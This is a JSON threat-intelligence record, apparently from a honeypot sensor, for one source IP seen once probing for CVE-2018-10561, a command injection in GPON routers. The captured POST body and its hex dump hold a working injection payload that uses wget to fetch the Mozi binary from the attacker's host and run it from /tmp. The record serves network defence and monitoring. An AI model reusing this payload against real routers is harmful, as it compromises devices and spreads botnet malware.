{"ip":"223.123.125.13","total_events":1,"verdict":{"verdict":"probing","label":"Low-level probing","detail":null,"confidence":"low","network_type":null},"first_seen":"2026-06-08T09:09:17","last_seen":"2026-06-08T09:09:17","events_24h":0,"events_7d":0,"geo":{"country_code":"PK","country_name":"Pakistan","region":"Punjab","city":"Toba Tek Singh","lat":31.0009,"lon":72.6394,"asn":138423,"org":"CMPak Limited"},"source_domain":null,"known_scanners":[],"scanner_tag":null,"cve_matches":[{"cve_id":"CVE-2018-10561","title":"GPON Router Command Injection","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"GponForm/diag_Form"}],"top_ports":[{"port":80,"proto":"tcp","label":"HTTP","count":1}],"fingerprints":{"ssh_hassh":[],"tls_ja4":[],"tls_ja3":[],"ja4h":["po11nn0600_1386cd485c90"]},"fingerprint_peers":{"po11nn0600_1386cd485c90":23},"user_agents":["Hello, World"],"timeline":[{"date":"2026-06-08","count":1}],"recent_events":[{"timestamp":"2026-06-08T09:09:17","port":80,"proto":"tcp","app_proto":"","app_protocol":"http","host":"127.0.0.1","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip, deflate\",\"connection\":\"keep-alive\",\"content-length\":\"118\",\"host\":\"127.0.0.1:80\",\"user-agent\":\"Hello, World\"}","body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://223.123.125.13:46831/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0","sni":"","tls_cipher":"","tls_version":"","alpn":[],"url_path":"/GponForm/diag_Form?images/","summary":"","payload_hex":"504f5354202f47706f6e466f726d2f646961675f466f726d3f696d616765732f20485454502f312e310d0a486f73743a203132372e302e302e313a38300d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a4163636570742d456e636f64696e673a20677a69702c206465666c6174650d0a4163636570743a202a2f2a0d0a557365722d4167656e743a2048656c6c6f2c20576f726c640d0a436f6e74656e742d4c656e6774683a203131380d0a0d0a58576562506167654e616d653d6469616726646961675f616374696f6e3d70696e672677616e5f636f6e6c6973743d3026646573745f686f73743d60603b776765742b687474703a2f2f3232332e3132332e3132352e31333a34363833312f4d6f7a692e6d2b2d4f2b2d3e2f746d702f67706f6e38303b73682b2f746d702f67706f6e3830266970763d30","method":"POST","user_agent":"Hello, World","community_id":"1:iOyperic7dKNeX8qyhVE43/cCFU=","ja3":"","session":"52c21619-c870-48f3-b599-2da059cd8fe4","seq":1,"duration_ms":101,"bytes_in":320,"bytes_out":79}],"http_methods":[{"method":"POST","count":1}],"distinct_ports_total":1,"top_paths":[{"path":"/GponForm/diag_Form?images/","count":1,"ports":1}],"distinct_paths_total":1,"top_snis":[],"top_hosts":[{"value":"127.0.0.1","count":1}],"top_alpns":[],"banners":[],"credentials":[],"header_profile":{"signature":["Accept","Accept-Encoding","Connection","Content-Length","Host","User-Agent"],"representative":[{"name":"Accept","value":"*/*","notable":false},{"name":"Accept-Encoding","value":"gzip, deflate","notable":false},{"name":"Connection","value":"keep-alive","notable":false},{"name":"Content-Length","value":"118","notable":false},{"name":"Host","value":"127.0.0.1:80","notable":false},{"name":"User-Agent","value":"Hello, World","notable":false}],"distinct_sets":1,"events_with_headers":1},"tags":[{"tag_id":"CVE-2018-10561","tag_type":"cve","title":"GPON Router Command Injection","severity":"CRITICAL","actively_exploited":true,"match_field":"url_path","matched_pattern":"GponForm/diag_Form","reference_urls":[]}],"data_as_of":"2026-06-20T08:17:17.074772+00:00"}